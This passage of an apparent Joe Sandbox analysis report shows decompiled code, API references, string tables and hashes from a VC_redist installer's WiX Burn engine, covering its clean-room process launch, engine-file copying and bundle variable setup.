                                                                          0x00030e40

                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,00030621,?,?), ref: 00030A85
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00030621,?,?), ref: 00030A92
                                                                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000000,00000000,?,00030621,?,?), ref: 00030ACE
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00030621,?,?), ref: 00030AD8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$EventObjectSingleWait
                                                                          • String ID: @Met$Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                          • API String ID: 3600396749-3765615505
                                                                          • Opcode ID: af674713f419af4e9ab1f3b54fb72663fa3693d88da9b49e7b4dbef5a80c3c35
                                                                          • Instruction ID: 9c01ef751aa096da112c902f983e3fc65abfa823af57651f2e838a2728513cbd
                                                                          • Opcode Fuzzy Hash: af674713f419af4e9ab1f3b54fb72663fa3693d88da9b49e7b4dbef5a80c3c35
                                                                          • Instruction Fuzzy Hash: 56913472B41722BBF7216AB98D09BA775DDEF04751F010221FE05FA5E0D765DC008AE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1141 14c33-14c7b call 3f670 call 133d7 1146 14c7d-14c8a call 5012f 1141->1146 1147 14c8f-14c99 call 296f2 1141->1147 1152 14e2b-14e35 1146->1152 1153 14ca2-14cb1 call 296f8 1147->1153 1154 14c9b-14ca0 1147->1154 1155 14e40-14e44 1152->1155 1156 14e37-14e3c CloseHandle 1152->1156 1162 14cb6-14cba 1153->1162 1157 14cd7-14cf2 call 11f20 1154->1157 1160 14e46-14e4b CloseHandle 1155->1160 1161 14e4f-14e53 1155->1161 1156->1155 1168 14cf4-14cf9 1157->1168 1169 14cfb-14d0f call 26859 1157->1169 1160->1161 1164 14e55-14e5a CloseHandle 1161->1164 1165 14e5e-14e60 1161->1165 1166 14cd1-14cd4 1162->1166 1167 14cbc 1162->1167 1164->1165 1170 14e62-14e63 CloseHandle 1165->1170 1171 14e65-14e79 call 12793 * 2 1165->1171 1166->1157 1172 14cc1-14ccc call 5012f 1167->1172 1168->1172 1179 14d11 1169->1179 1180 14d29-14d3d call 26915 1169->1180 1170->1171 1185 14e83-14e87 1171->1185 1186 14e7b-14e7e call 554ef 1171->1186 1172->1152 1182 14d16 1179->1182 1193 14d46-14d61 call 11f62 1180->1193 1194 14d3f-14d44 1180->1194 1187 14d1b-14d24 call 5012f 1182->1187 1190 14e91-14e99 1185->1190 1191 14e89-14e8c call 554ef 1185->1191 1186->1185 1199 14e28 1187->1199 1191->1190 1200 14d63-14d68 1193->1200 1201 14d6d-14d86 call 11f62 1193->1201 1194->1182 1199->1152 1200->1172 1204 14d92-14dbe CreateProcessW 1201->1204 1205 14d88-14d8d 1201->1205 1206 14dc0-14df6 call 137d3 1204->1206 1207 14dfb-14e11 call 50917 1204->1207 1205->1172 1206->1187 1210 14e16-14e1a 1207->1210 1210->1152 1211 14e1c-14e23 call 5012f 1210->1211 1211->1199
                                                                          C-Code - Quality: 58%
                                                                          			E00014C33(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                          				char _v12;
                                                                          				struct _SECURITY_ATTRIBUTES* _v16;
                                                                          				struct _SECURITY_ATTRIBUTES* _v20;
                                                                          				struct _SECURITY_ATTRIBUTES* _v24;
                                                                          				struct _SECURITY_ATTRIBUTES* _v28;
                                                                          				struct _SECURITY_ATTRIBUTES* _v32;
                                                                          				struct _PROCESS_INFORMATION _v48;
                                                                          				struct _STARTUPINFOW _v116;
                                                                          				void* __edi;
                                                                          				void* _t66;
                                                                          				void* _t70;
                                                                          				WCHAR* _t71;
                                                                          				void* _t73;
                                                                          				void* _t76;
                                                                          				void* _t79;
                                                                          				int _t87;
                                                                          				void* _t90;
                                                                          				signed short _t101;
                                                                          				void* _t107;
                                                                          				intOrPtr _t108;
                                                                          				void* _t109;
                                                                          				void* _t114;
                                                                          				void* _t115;
                                                                          				WCHAR* _t117;
                                                                          				void* _t120;
                                                                          				void* _t125;
                                                                          				void* _t130;
                                                                          				void* _t131;
                                                                          				void* _t132;
                                                                          				void* _t133;
                                                                          
                                                                          				_t114 = __edx;
                                                                          				_v16 = 0;
                                                                          				_v32 = 0;
                                                                          				_v12 = 0;
                                                                          				_v28 = 0;
                                                                          				E0003F670(_t115,  &_v116, 0, 0x44);
                                                                          				_v24 = 0;
                                                                          				_v20 = 0;
                                                                          				asm("stosd");
                                                                          				_t131 = _t130 + 0xc;
                                                                          				_t107 = 0;
                                                                          				_v8 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t120 = E000133D7( &_v16, 0);
                                                                          				if(_t120 >= 0) {
                                                                          					_t66 = E000296F2();
                                                                          					_t108 = _a8;
                                                                          					if(_t66 == 0) {
                                                                          						_t70 = E000296F8(_t109, _t114, _t108 + 0xbc, _t108 + 0x48,  &_v32); // executed
                                                                          						if(_t70 >= 0) {
                                                                          							_t117 = _v32;
                                                                          							_t71 = _v16;
                                                                          							goto L8;
                                                                          						} else {
                                                                          							_push("Failed to cache to clean room.");
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						_t71 = _v16;
                                                                          						_t117 = _t71;
                                                                          						L8:
                                                                          						_push(_t71);
                                                                          						_t73 = E00011F20( &_v12, L"-%ls=\"%ls\"", L"burn.clean.room");
                                                                          						_t132 = _t131 + 0x10;
                                                                          						if(_t73 >= 0) {
                                                                          							_t76 = E00026859(_t109,  *((intOrPtr*)(_t108 + 0x48)),  &_v24,  &_v12); // executed
                                                                          							if(_t76 >= 0) {
                                                                          								_t79 = E00026915(_t117,  &_v20,  &_v12, 0); // executed
                                                                          								if(_t79 >= 0) {
                                                                          									_push(_a4);
                                                                          									_t125 = E00011F62( &_v12, L"%ls %ls", _v12);
                                                                          									_t133 = _t132 + 0x10;
                                                                          									if(_t125 >= 0) {
                                                                          										_push(_v12);
                                                                          										_t125 = E00011F62( &_v28, L"\"%ls\" %ls", _t117);
                                                                          										_t132 = _t133 + 0x10;
                                                                          										if(_t125 >= 0) {
                                                                          											_v116.wShowWindow =  *((intOrPtr*)(_t108 + 0x2c));
                                                                          											_v116.cb = 0x44;
                                                                          											_t87 = CreateProcessW(_t117, _v28, 0, 0, 1, 0, 0, 0,  &_v116,  &_v48); // executed
                                                                          											if(_t87 != 0) {
                                                                          												_v8 = _v48.hProcess;
                                                                          												_t107 = _v8;
                                                                          												_v48.hProcess = 0;
                                                                          												_t90 = E00050917(_t109, _t107, 0xffffffff, _t108 + 0xf8); // executed
                                                                          												_t125 = _t90;
                                                                          												if(_t125 < 0) {
                                                                          													E0005012F(_t125, "Failed to wait for clean room process: %ls", _t117);
                                                                          													goto L24;
                                                                          												}
                                                                          											} else {
                                                                          												_t101 = GetLastError();
                                                                          												_t129 =  <=  ? _t101 : _t101 & 0x0000ffff | 0x80070000;
                                                                          												_t125 =  >=  ? 0x80004005 :  <=  ? _t101 : _t101 & 0x0000ffff | 0x80070000;
                                                                          												E000137D3(0x80004005, "engine.cpp", 0x1ce, _t125);
                                                                          												_push(_v28);
                                                                          												_push("Failed to launch clean room process: %ls");
                                                                          												goto L13;
                                                                          											}
                                                                          										} else {
                                                                          											_push("Failed to allocate full command-line.");
                                                                          											goto L6;
                                                                          										}
                                                                          									} else {
                                                                          										_push("Failed to append original command line.");
                                                                          										goto L6;
                                                                          									}
                                                                          								} else {
                                                                          									_push(L"burn.filehandle.self");
                                                                          									goto L12;
                                                                          								}
                                                                          							} else {
                                                                          								_push(L"burn.filehandle.attached");
                                                                          								L12:
                                                                          								_push("Failed to append %ls");
                                                                          								L13:
                                                                          								_push(_t125);
                                                                          								E0005012F();
                                                                          								_t107 = _v8;
                                                                          								L24:
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to allocate parameters for unelevated process.");
                                                                          							L6:
                                                                          							_push(_t125);
                                                                          							E0005012F();
                                                                          							_t107 = _v8;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to get path for current process.");
                                                                          					_push(_t120);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v48.hThread != 0) {
                                                                          					CloseHandle(_v48.hThread);
                                                                          					_v48.hThread = _v48.hThread & 0x00000000;
                                                                          				}
                                                                          				if(_v20 != 0xffffffff) {
                                                                          					CloseHandle(_v20);
                                                                          					_v20 = _v20 | 0xffffffff;
                                                                          				}
                                                                          				if(_v24 != 0xffffffff) {
                                                                          					CloseHandle(_v24);
                                                                          					_v24 = _v24 | 0xffffffff;
                                                                          				}
                                                                          				if(_t107 != 0) {
                                                                          					CloseHandle(_t107);
                                                                          				}
                                                                          				E00012793(_v28);
                                                                          				E00012793(_v12);
                                                                          				if(_v32 != 0) {
                                                                          					E000554EF(_v32);
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					E000554EF(_v16);
                                                                          				}
                                                                          				return _t125;
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 000133D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000110DD,?,00000000), ref: 000133F8
                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00014E3A
                                                                          • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00014E49
                                                                          • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00014E58
                                                                          • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00014E63
                                                                          Strings
                                                                          • %ls %ls, xrefs: 00014D4F
                                                                          • user.cpp, xrefs: 00014DE4
                                                                          • burn.filehandle.self, xrefs: 00014D3F
                                                                          • Failed to cache to clean room., xrefs: 00014CBC
                                                                          • D, xrefs: 00014DA3
                                                                          • Failed to append %ls, xrefs: 00014D16
                                                                          • Failed to append original command line., xrefs: 00014D63
                                                                          • Failed to wait for clean room process: %ls, xrefs: 00014E1D
                                                                          • -%ls="%ls", xrefs: 00014CE0
                                                                          • Failed to allocate parameters for unelevated process., xrefs: 00014CF4
                                                                          • burn.filehandle.attached, xrefs: 00014D11
                                                                          • Failed to allocate full command-line., xrefs: 00014D88
                                                                          • Failed to get path for current process., xrefs: 00014C7D
                                                                          • burn.clean.room, xrefs: 00014CD8
                                                                          • "%ls" %ls, xrefs: 00014D74
                                                                          • Failed to launch clean room process: %ls, xrefs: 00014DF1
                                                                          • @Met, xrefs: 00014DC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$FileModuleName
                                                                          • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$@Met$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$user.cpp
                                                                          • API String ID: 3884789274-88123116
                                                                          • Opcode ID: 0ae78698e3a9ba8a13d0e2e38f79432df5655c7942994deadf39c20cec84a054
                                                                          • Instruction ID: e08bfd0c0ede1ab8fecd07f4b05487a6a8ed6816ab0317fd430b9bf4217afb0a
                                                                          • Opcode Fuzzy Hash: 0ae78698e3a9ba8a13d0e2e38f79432df5655c7942994deadf39c20cec84a054
                                                                          • Instruction Fuzzy Hash: 34718631D00229ABDF219BA4CC41DEFBBBCAF04711F114165FE14BB1A1D7745A858BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 1215 284c4-28512 CreateFileW 1216 28514-28553 call 137d3 call 5012f 1215->1216 1217 28558-28568 call 547d3 1215->1217 1235 286fc-2870e call 3de36 1216->1235 1222 28580-28594 call 53db5 1217->1222 1223 2856a-2857b call 5012f 1217->1223 1232 28596-285aa call 5012f 1222->1232 1233 285af-285b4 1222->1233 1231 286f5-286f6 FindCloseChangeNotification 1223->1231 1231->1235 1232->1231 1233->1231 1234 285ba-285c9 SetFilePointerEx 1233->1234 1238 28603-28613 call 54cee 1234->1238 1239 285cb-285fe call 137d3 1234->1239 1246 28615-2861a 1238->1246 1247 2861f-28630 SetFilePointerEx 1238->1247 1249 286ed-286f4 call 5012f 1239->1249 1246->1249 1250 28632-28665 call 137d3 1247->1250 1251 2866a-2867a call 54cee 1247->1251 1249->1231 1250->1249 1251->1246 1258 2867c-2868c call 54cee 1251->1258 1258->1246 1262 2868e-2869f SetFilePointerEx 1258->1262 1263 286a1-286d4 call 137d3 1262->1263 1264 286d6-286dd call 54cee 1262->1264 1263->1249 1266 286e2-286e6 1264->1266 1266->1231 1268 286e8 1266->1268 1268->1249
                                                                          C-Code - Quality: 73%
                                                                          			E000284C4(void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				char _v20;
                                                                          				WCHAR* _v24;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v32;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t25;
                                                                          				void* _t29;
                                                                          				void* _t31;
                                                                          				void* _t33;
                                                                          				int _t37;
                                                                          				void* _t39;
                                                                          				int _t41;
                                                                          				void* _t43;
                                                                          				void* _t46;
                                                                          				int _t48;
                                                                          				void* _t50;
                                                                          				signed short _t51;
                                                                          				signed short _t54;
                                                                          				signed short _t57;
                                                                          				signed short _t62;
                                                                          				intOrPtr _t66;
                                                                          				WCHAR* _t67;
                                                                          				void* _t73;
                                                                          				void* _t75;
                                                                          				signed int _t91;
                                                                          
                                                                          				_t73 = __edx;
                                                                          				_t25 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t25 ^ _t91;
                                                                          				_t67 = _a12;
                                                                          				_t66 = _a16;
                                                                          				_t76 = _a4;
                                                                          				_v28 = _a8;
                                                                          				_v32 = _a4;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_v24 = _t67;
                                                                          				asm("stosd"); // executed
                                                                          				_t29 = CreateFileW(_t67, 0x40000000, 5, 0, 2, 0x8000080, 0); // executed
                                                                          				_t75 = _t29;
                                                                          				if(_t75 != 0xffffffff) {
                                                                          					_t31 = E000547D3(_t67, _t76, 0, 0, 0, 0); // executed
                                                                          					_t77 = _t31;
                                                                          					if(_t31 >= 0) {
                                                                          						_t33 = E00053DB5(_t73, _v32, _t75,  *((intOrPtr*)(_t66 + 0xc)), 0, 0); // executed
                                                                          						_t77 = _t33;
                                                                          						if(_t77 >= 0) {
                                                                          							if( *((intOrPtr*)(_t66 + 0x28)) != 0) {
                                                                          								_push(0);
                                                                          								_t37 = SetFilePointerEx(_t75,  *(_t66 + 0x18), 0, 0); // executed
                                                                          								if(_t37 != 0) {
                                                                          									_t39 = E00054CEE(0, _t75, _t66 + 0x24, 4); // executed
                                                                          									if(_t39 >= 0) {
                                                                          										_push(0);
                                                                          										_t41 = SetFilePointerEx(_t75,  *(_t66 + 0x1c), 0, 0); // executed
                                                                          										if(_t41 != 0) {
                                                                          											_t43 = E00054CEE(0, _t75, _t66 + 0x28, 4); // executed
                                                                          											_t77 = _t43;
                                                                          											if(_t77 < 0) {
                                                                          												goto L10;
                                                                          											} else {
                                                                          												_t46 = E00054CEE(0, _t75, _t66 + 0x2c, 4); // executed
                                                                          												_t77 = _t46;
                                                                          												if(_t77 < 0) {
                                                                          													goto L10;
                                                                          												} else {
                                                                          													_push(0);
                                                                          													_t48 = SetFilePointerEx(_t75,  *(_t66 + 0x20), 0, 0); // executed
                                                                          													if(_t48 != 0) {
                                                                          														_t50 = E00054CEE(0, _t75,  &_v20, 0xc); // executed
                                                                          														_t77 = _t50;
                                                                          														if(_t77 < 0) {
                                                                          															_push("Failed to zero out original data offset.");
                                                                          															goto L19;
                                                                          														}
                                                                          													} else {
                                                                          														_t51 = GetLastError();
                                                                          														_t81 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          														_t77 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          														E000137D3(0x80004005, "cache.cpp", 0x6d6, _t77);
                                                                          														_push("Failed to seek to original data in exe burn section header.");
                                                                          														goto L19;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											_t54 = GetLastError();
                                                                          											_t84 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          											_t77 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          											E000137D3(0x80004005, "cache.cpp", 0x6c9, _t77);
                                                                          											_push("Failed to seek to signature table in exe header.");
                                                                          											goto L19;
                                                                          										}
                                                                          									} else {
                                                                          										L10:
                                                                          										_push("Failed to update signature offset.");
                                                                          										goto L19;
                                                                          									}
                                                                          								} else {
                                                                          									_t57 = GetLastError();
                                                                          									_t87 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          									_t77 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          									E000137D3(0x80004005, "cache.cpp", 0x6bf, _t77);
                                                                          									_push("Failed to seek to checksum in exe header.");
                                                                          									L19:
                                                                          									_push(_t77);
                                                                          									E0005012F();
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_push(_v24);
                                                                          							E0005012F(_t77, "Failed to copy engine from: %ls to: %ls", _v28);
                                                                          						}
                                                                          					} else {
                                                                          						E0005012F(_t77, "Failed to seek to beginning of engine file: %ls", _v28);
                                                                          					}
                                                                          					FindCloseChangeNotification(_t75); // executed
                                                                          				} else {
                                                                          					_t62 = GetLastError();
                                                                          					_t90 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          					_t77 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "cache.cpp", 0x6af,  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000);
                                                                          					E0005012F( >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000, "Failed to create engine file at path: %ls", _v24);
                                                                          				}
                                                                          				return E0003DE36(_t66, _v8 ^ _t91, _t73, _t75, _t77);
                                                                          			}

































                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00014CB6,?,?,00000000,00014CB6,00000000), ref: 00028507
                                                                          • GetLastError.KERNEL32 ref: 00028514
                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,0005B4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000286F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseCreateErrorFileFindLastNotification
                                                                          • String ID: @Met$Failed to copy user from: %ls to: %ls$Failed to create user file at path: %ls$Failed to seek to beginning of user file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                          • API String ID: 4091947256-324234727
                                                                          • Opcode ID: 788919be38fd9f561398f03461ac679be6a0c1bf24bd98187009086be727eef9
                                                                          • Instruction ID: 62fd8bfa9e457a1779404226ae8a85d2bdd32104c15a26103de596e41121a74a
                                                                          • Opcode Fuzzy Hash: 788919be38fd9f561398f03461ac679be6a0c1bf24bd98187009086be727eef9
                                                                          • Instruction Fuzzy Hash: 7B51D176A41731BFFB216A689C4AFBF36A9EF04711F014125FE05EB281EB659C0087E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 83%
                                                                          			E00027337(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				char _v28;
                                                                          				char _v32;
                                                                          				char _v36;
                                                                          				char _v124;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* _t70;
                                                                          				intOrPtr _t73;
                                                                          				intOrPtr _t76;
                                                                          				intOrPtr _t81;
                                                                          				intOrPtr _t96;
                                                                          				intOrPtr _t105;
                                                                          				intOrPtr _t106;
                                                                          				intOrPtr* _t107;
                                                                          				intOrPtr _t109;
                                                                          				intOrPtr _t110;
                                                                          				void* _t140;
                                                                          				void* _t141;
                                                                          				intOrPtr _t142;
                                                                          				intOrPtr _t149;
                                                                          				intOrPtr _t152;
                                                                          
                                                                          				_t140 = __edx;
                                                                          				_v12 = 0;
                                                                          				_v28 = 0;
                                                                          				_v20 = 0;
                                                                          				_v32 = 0;
                                                                          				E0003F670(_t141,  &_v124, 0, 0x58);
                                                                          				_t142 = _a4;
                                                                          				_v36 = 0;
                                                                          				_v8 = 0;
                                                                          				_v16 = 0;
                                                                          				_v24 = 0;
                                                                          				_t11 = _t142 + 0x88; // 0x1533d
                                                                          				_t135 = _t11;
                                                                          				_t70 = E00017503(_t11); // executed
                                                                          				if(_t70 >= 0) {
                                                                          					_t13 = _t142 + 0x48; // 0x152fd
                                                                          					_t73 = E0001C2A1(_t13,  &_v124); // executed
                                                                          					__eflags = _t73;
                                                                          					if(_t73 >= 0) {
                                                                          						_t76 = E0001C108( &_v124,  &_v28);
                                                                          						__eflags = _t76;
                                                                          						if(_t76 >= 0) {
                                                                          							__eflags = E0001C362( &_v124,  &_v20,  &_v32);
                                                                          							if(__eflags >= 0) {
                                                                          								_t81 = E0003BDC9(__eflags, _v20, _v32, _t142); // executed
                                                                          								__eflags = _t81;
                                                                          								if(_t81 >= 0) {
                                                                          									_t22 = _t142 + 0x1c0; // 0x15475
                                                                          									_t23 = _t142 + 0x4d8; // 0x1578d
                                                                          									_t24 = _t142 + 0x140; // 0x153f5
                                                                          									_t25 = _t142 + 0x400; // 0x156b5
                                                                          									_t26 = _t142 + 0x3fc; // 0x156b1
                                                                          									_t27 = _t142 + 0x4d4; // 0x15789
                                                                          									_t30 = _t142 + 0x3ec; // 0x156a1
                                                                          									_t31 = _t142 + 0x494; // 0x15749
                                                                          									_t32 = _t142 + 0x490; // 0x15745
                                                                          									_t136 = _t32;
                                                                          									_t33 = _t142 + 0x4b8; // 0x1576d
                                                                          									_t34 = _t142 + 0x4a0; // 0x15755
                                                                          									_t35 = _t142 + 0x1c; // 0x152d1
                                                                          									_t36 = _t142 + 0x4e0; // 0x485
                                                                          									_t37 = _t142 + 0x4dc; // 0x48d016a
                                                                          									_t96 = E00025A35( *_t37,  *_t36, _t35, _t34, _t33, _t135, _t32, _t31, _t30,  &_v8,  &_v24, _t27, _t26, _t25, _t24, _t23, _t22,  &_v12);
                                                                          									__eflags = _t96;
                                                                          									if(_t96 >= 0) {
                                                                          										__eflags = _v12;
                                                                          										_t98 =  !=  ? _v12 : 0x5b524;
                                                                          										E0001550F(2, 0x20000009,  !=  ? _v12 : 0x5b524);
                                                                          										E0005076C(GetCurrentProcess(),  &_v36); // executed
                                                                          										asm("cdq");
                                                                          										_t149 = E00018152(_t135, L"WixBundleElevated", _v36, _t140, 1);
                                                                          										__eflags = _t149;
                                                                          										if(_t149 >= 0) {
                                                                          											_t105 = _v8;
                                                                          											__eflags = _t105;
                                                                          											if(_t105 == 0) {
                                                                          												L21:
                                                                          												_t106 = _v24;
                                                                          												__eflags = _t106;
                                                                          												if(_t106 == 0) {
                                                                          													L24:
                                                                          													_t47 = _t142 + 0x490; // 0x15745
                                                                          													_t107 = _t47;
                                                                          													__eflags =  *_t107;
                                                                          													if( *_t107 == 0) {
                                                                          														L27:
                                                                          														_t49 = _t142 + 0x100; // 0x153b5
                                                                          														_t109 = E0002A307(_t135, _t49, _t135, _v8); // executed
                                                                          														__eflags = _t109;
                                                                          														if(_t109 >= 0) {
                                                                          															_t50 = _t142 + 0x490; // 0x15745
                                                                          															_t107 = _t50;
                                                                          															goto L30;
                                                                          														} else {
                                                                          															_push("Failed to initialize internal cache functionality.");
                                                                          															goto L38;
                                                                          														}
                                                                          													} else {
                                                                          														__eflags =  *_t107 - 1;
                                                                          														if( *_t107 == 1) {
                                                                          															goto L27;
                                                                          														} else {
                                                                          															__eflags =  *_t107 - 3;
                                                                          															if( *_t107 != 3) {
                                                                          																L30:
                                                                          																__eflags =  *_t107 - 1;
                                                                          																if(__eflags == 0) {
                                                                          																	L32:
                                                                          																	_t51 = _t142 + 0xcc; // 0x15381
                                                                          																	_t135 = _t51;
                                                                          																	_t52 = _t142 + 0x110; // 0xfff9e89d
                                                                          																	_t110 = E0001D497(_t136, _t140, _t142, __eflags,  *_t52, _t51);
                                                                          																	__eflags = _t110;
                                                                          																	if(_t110 >= 0) {
                                                                          																		_t54 = _t142 + 0xbc; // 0x15371
                                                                          																		_t152 = E0001CABE(_t54, 0,  &_v124,  *_t135);
                                                                          																		__eflags = _t152;
                                                                          																		if(_t152 >= 0) {
                                                                          																			_t55 = _t142 + 0xbc; // 0x15371
                                                                          																			_t56 = _t142 + 0x2b0; // 0x15565
                                                                          																			_t152 = E0001C7DF(_t140, _t56, _t55);
                                                                          																			__eflags = _t152;
                                                                          																			if(_t152 < 0) {
                                                                          																				_push("Failed to load catalog files.");
                                                                          																				goto L38;
                                                                          																			}
                                                                          																		} else {
                                                                          																			_push("Failed to extract bootstrapper application payloads.");
                                                                          																			goto L38;
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to get unique temporary folder for bootstrapper application.");
                                                                          																		goto L38;
                                                                          																	}
                                                                          																} else {
                                                                          																	__eflags =  *_t107 - 3;
                                                                          																	if(__eflags == 0) {
                                                                          																		goto L32;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																goto L27;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													_t152 = E000180F6(_t135, L"WixBundleOriginalSource", _t106, 0);
                                                                          													__eflags = _t152;
                                                                          													if(_t152 >= 0) {
                                                                          														goto L24;
                                                                          													} else {
                                                                          														_push("Failed to set original source variable.");
                                                                          														goto L38;
                                                                          													}
                                                                          												}
                                                                          											} else {
                                                                          												_t152 = E000180F6(_t135, L"WixBundleSourceProcessPath", _t105, 1);
                                                                          												__eflags = _t152;
                                                                          												if(_t152 >= 0) {
                                                                          													_t152 = E00013446(_t136, _v8,  &_v16);
                                                                          													__eflags = _t152;
                                                                          													if(_t152 >= 0) {
                                                                          														_t152 = E000180F6(_t135, L"WixBundleSourceProcessFolder", _v16, 1);
                                                                          														__eflags = _t152;
                                                                          														if(_t152 >= 0) {
                                                                          															goto L21;
                                                                          														} else {
                                                                          															_push("Failed to set source process folder variable.");
                                                                          															goto L38;
                                                                          														}
                                                                          													} else {
                                                                          														_push("Failed to get source process folder from path.");
                                                                          														goto L38;
                                                                          													}
                                                                          												} else {
                                                                          													_push("Failed to set source process path variable.");
                                                                          													goto L38;
                                                                          												}
                                                                          											}
                                                                          										} else {
